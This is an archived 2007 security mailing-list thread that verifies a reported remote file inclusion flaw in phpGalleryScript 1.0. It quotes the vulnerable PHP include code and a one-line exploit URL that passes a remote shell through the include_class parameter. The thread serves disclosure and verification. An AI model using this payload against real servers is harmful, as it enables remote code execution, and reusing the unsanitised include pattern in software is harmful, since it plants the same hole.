[VIM] false: phpGalleryScript 1.0 - File Inclusion Vulnerabilities

rkeith at securityfocus.com rkeith at securityfocus.com
Tue Apr 10 19:58:13 UTC 2007


dirname("http://milw0rm.com/test") => http://milw0rm.com

Looks valid to me.

--
Rob Keith
Symantec

On Tue, 10 Apr 2007, str0ke wrote:

> init.gallery.php
> #######################3
>
> $inc_path = dirname($include_class);
> require ($inc_path."/class.gallery.php");
> include($inc_path."/config.gallery.php");
> ....
> #######################3
>
> dirname("http://milw0rm.com") == http:
>
> /str0ke
>
> ---------- Forwarded message ----------
> From: z12xxa at gmail.com <z12xxa at gmail.com>
> Date: 9 Apr 2007 23:19:32 -0000
> Subject: phpGalleryScript 1.0 - File Inclusion Vulnerabilities
> To: bugtraq at securityfocus.com
>
>
> vendor url: http://tomex.org/
>
> http://[victim]/php/init.gallery.php?include_class=[SHELL]
>


More information about the VIM mailing list